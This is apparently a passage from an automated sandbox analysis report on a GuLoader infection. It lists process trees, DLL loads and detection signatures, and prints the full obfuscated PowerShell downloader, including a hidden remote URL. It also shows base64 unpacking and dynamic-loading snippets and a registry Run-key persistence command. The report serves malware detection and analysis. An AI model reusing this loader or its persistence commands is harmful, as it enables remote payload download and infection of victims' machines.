knivbTC,rva:morte\KonomGSlutkrS.igey S,agnBlahltPne,me stern SilkdTalene FejnsMes n.Fritit SubmxbismutCosmo Under-RhyptV Ext.a ,atol f,inuPublieKolla Nook $SkrivTRubler.orynaChancdZonaliGe.trtC.nidi NoncoKitnin Uds,sOrig ;Recep ');biblioteksfilerne (Tyknende ' Repai edelfBasqu Diff(HoppetStucce Sce,s ivsvtEpe.i-.odstpBarriaTyroltSysgth ang CalcaTPatro:Rigad\IsoclGUnordr Aggryamputn,hrootBordhe agttn myecdGui ee RevesFlere.Ps,udtPlastxPantet prun) Snot{D sene VindxleafsiKultutSonor} Sies;Limen ');$Kursusoversigten = Tyknende 'Servoe ontcN gashBi.looUnchi Preco%VagnuaKodiapPseu,pSe,igdAlt.baPeru.tInteraSpa.l%Stuve\DismeVcirc.aKerattFarvee SprarSleyspS.angaSha rsgutsesUnmeweYlvahnSundheAfspnsKsehu2Wiens4 Para.BesteAPatruc .llecmyone Resou&Parad&t.lip DiscueDurescBogtihLgel,okilot Re.ia$B sni ';biblioteksfilerne (Tyknende 'Blidh$KitnigToxollstrbsogeckobS,ffeaAristlTrans:tun,nTMephii.ammetDe uta.apitrSto.m= I.er(Modtac PresmIndevdAfhng Henst/tenebcOpt.i Im,r$Hord,K TrykuFje nr Skgls BeliusukkesNyoproKomm,vTelesePharmr AritsL mpnianligg rimot TweeeEmpirnDi.yo)Majus ');biblioteksfilerne (Tyknende 'citat$Comp.gEnd,sl TrygoAjlefbWeddea Br,dl Haa.:Hold FSlidsaRefuseL.ngtrAarvad Punki St rg,ross=Sk.iv$HandgDAlhusiGaulle DiaznFradr. OversStephp SheblservaigymnatAmtsv(Ouvri$AlpevLHospioD apen IdocgSe.ulrSustiu Griln Spar)ele h ');$Dien=$Faerdig[0];biblioteksfilerne (Tyknende ' Girl$ Un egA drolDredgoMortabOver,a B.baJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Vaterpassenes24.Acc && echo $"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)"Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)"Jump to behavior
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"Jump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: slc.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.2228792589.00000000082A5000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 0000000A.00000002.2226049542.00000000073D6000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdb source: powershell.exe, 0000000A.00000002.2226049542.00000000073D6000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: wab.exe, clip.exe
          Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.2226049542.0000000007469000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdbk source: powershell.exe, 0000000A.00000002.2226049542.00000000073D6000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000A.00000002.2226049542.00000000073D6000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          VBScript performs obfuscated calls to suspicious functions
          Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("POWERSHELL "$Reglorified = 1;$Toupe='S';$Toupe+='ubstrin';$Toupe+='g';Function Tyknende($Frontotemporal){$Kommand", "0")
          Yara detected GuLoader
          Source: Yara matchFile source: 0000000F.00000002.2467703895.0000000004F10000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2231302976.000000000AFC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2230990264.0000000008710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2197404574.0000000005936000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2815067045.000001A99C1F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Found suspicious powershell code related to unpacking or dynamic code loading
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Fosser)$global:Delegeretmder = [System.Text.Encoding]::ASCII.GetString($Positionsangivelse)$global:Binres=$Delegeretmder.substring(284021,28471)<#Gazy Kjolekldte Auletai #>$Entreater
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Messed $Marikka $Bhmere), (Elskende @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Silkeforenes216 = [AppDomain]::CurrentDomain.GetAssemblies()$global:Sta
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Sammentmret)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Krekortets, $false).DefineType($Tanjib, $Gitt
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Fosser)$global:Delegeretmder = [System.Text.Encoding]::ASCII.GetString($Positionsangivelse)$global:Binres=$Delegeretmder.substring(284021,28471)<#Gazy Kjolekldte Auletai #>$Entreater
          Suspicious powershell command line found
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Reglorified = 1;$Toupe='S';$Toupe+='ubstrin';$Toupe+='g';Function Tyknende($Frontotemporal){$Kommandodeles=$Frontotemporal.Length-$Reglorified;For($Nummerordens=5;$Nummerordens -lt $Kommandodeles;$Nummerordens+=6){$Crpe+=$Frontotemporal.$Toupe.Invoke( $Nummerordens, $Reglorified);}$Crpe;}function biblioteksfilerne($kedelcentralen){& ($Dataanlgs) ($kedelcentralen);}$Udskilles=Tyknende 'SnuggMfo.oro Loo zKa.aniStoo,lFlan lSmaaga len,/ U fi5H.gge.Mawse0 Xant Lint(Reae WPaikiiTorden StnidSk ftoM.gtswGrasssGivin Hovs.NAs.erTOutbr Kvot,1Goupi0Poess. ook0Recr,;Tilkn B.arWUnderiTorrinKalku6Rekor4Vandm; Oldt GodkexSlamb6Anvis4Overw;Rente TaalrRrgssvsvige:Ae,li1Synan2 Rupi1 ukat.,onra0Lo.ds)Apoth LouirGTempee OvercGenfokIso.co Syst/Menis2Ioevr0Stan.1Varsl0 sses0subst1 Coex0Un af1Raias IldneFDo,ediOvnhur,etere Luk,fAreahonobblx ara/ Ekvi1kha.e2Folk,1B.lls. Besk0Forme ';$Primevally=Tyknende '.rsteUHy,ossSquibe,parerRewar-TenanAFictigAffaee parn Jerrt Myrt ';$Dien=Tyknende 'SynsmhMilittVajedtDarenpS.eep:Dob,o/Perpl/Erase8Siren7Nonwe. jack1 ,ive2 Over1 Ar,g.Beret1Retst0Maler5Reded..ippe5Spare4Count/SculpOChapoxMec da D,pllBl eduSlippr imuli Cplma Indi2ret t0Libet9Thick.No,ensPostnmJo,dbi.onsu ';$Longrun=Tyknende 'Folke>Patte ';$Dataanlgs=Tyknende ' Verdi Unree NonvxTppe ';$Traditions='Nashira';biblioteksfilerne (Tyknende 'GregsSUnasseGrmmetPersi-HvalfCPieb.o Inv n CinntHerdsePrve nIndtetBrede Argum-RefitPPla taMbelptAfgrfhklar knivbTC,rva:morte\KonomGSlutkrS.igey S,agnBlahltPne,me stern SilkdTalene FejnsMes n.Fritit SubmxbismutCosmo Under-RhyptV Ext.a ,atol f,inuPublieKolla Nook $SkrivTRubler.orynaChancdZonaliGe.trtC.nidi NoncoKitnin Uds,sOrig ;Recep ');biblioteksfilerne (Tyknende ' Repai edelfBasqu Diff(HoppetStucce Sce,s ivsvtEpe.i-.odstpBarriaTyroltSysgth ang CalcaTPatro:Rigad\IsoclGUnordr Aggryamputn,hrootBordhe agttn myecdGui ee RevesFlere.Ps,udtPlastxPantet prun) Snot{D sene VindxleafsiKultutSonor} Sies;Limen ');$Kursusoversigten = Tyknende 'Servoe ontcN gashBi.looUnchi Preco%VagnuaKodiapPseu,pSe,igdAlt.baPeru.tInteraSpa.l%Stuve\DismeVcirc.aKerattFarvee SprarSleyspS.angaSha rsgutsesUnmeweYlvahnSundheAfspnsKsehu2Wiens4 Para.BesteAPatruc .llecmyone Resou&Parad&t.lip DiscueDurescBogtihLgel,okilot Re.ia$B sni ';biblioteksfilerne (Tyknende 'Blidh$KitnigToxollstrbsogeckobS,ffeaAristlTrans:tun,nTMephii.ammetDe uta.apitrSto.m= I.er(Modtac PresmIndevdAfhng Henst/tenebcOpt.i Im,r$Hord,K TrykuFje nr Skgls BeliusukkesNyoproKomm,vTelesePharmr AritsL mpnianligg rimot TweeeEmpirnDi.yo)Majus ');biblioteksfilerne (Tyknende 'citat$Comp.gEnd,sl TrygoAjlefbWeddea Br,dl Haa.:Hold FSlidsaRefuseL.ngtrAarvad Punki St rg,ross=Sk.iv$HandgDAlhusiGaulle DiaznFradr. OversStephp SheblservaigymnatAmtsv(Ouvri$AlpevLHospioD apen IdocgSe.ulrSustiu Griln Spar)ele h ');$Dien=$Faerdig[0];biblioteksfilerne (Tyknende ' Girl$ Un egA drolDredgoMortabOver,a B.ba
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Reglorified = 1;$Toupe='S';$Toupe+='ubstrin';$Toupe+='g';Function Tyknende($Frontotemporal){$Kommandodeles=$Frontotemporal.Length-$Reglorified;For($Nummerordens=5;$Nummerordens -lt $Kommandodeles;$Nummerordens+=6){$Crpe+=$Frontotemporal.$Toupe.Invoke( $Nummerordens, $Reglorified);}$Crpe;}function biblioteksfilerne($kedelcentralen){& ($Dataanlgs) ($kedelcentralen);}$Udskilles=Tyknende 'SnuggMfo.oro Loo zKa.aniStoo,lFlan lSmaaga len,/ U fi5H.gge.Mawse0 Xant Lint(Reae WPaikiiTorden StnidSk ftoM.gtswGrasssGivin Hovs.NAs.erTOutbr Kvot,1Goupi0Poess. ook0Recr,;Tilkn B.arWUnderiTorrinKalku6Rekor4Vandm; Oldt GodkexSlamb6Anvis4Overw;Rente TaalrRrgssvsvige:Ae,li1Synan2 Rupi1 ukat.,onra0Lo.ds)Apoth LouirGTempee OvercGenfokIso.co Syst/Menis2Ioevr0Stan.1Varsl0 sses0subst1 Coex0Un af1Raias IldneFDo,ediOvnhur,etere Luk,fAreahonobblx ara/ Ekvi1kha.e2Folk,1B.lls. Besk0Forme ';$Primevally=Tyknende '.rsteUHy,ossSquibe,parerRewar-TenanAFictigAffaee parn Jerrt Myrt ';$Dien=Tyknende 'SynsmhMilittVajedtDarenpS.eep:Dob,o/Perpl/Erase8Siren7Nonwe. jack1 ,ive2 Over1 Ar,g.Beret1Retst0Maler5Reded..ippe5Spare4Count/SculpOChapoxMec da D,pllBl eduSlippr imuli Cplma 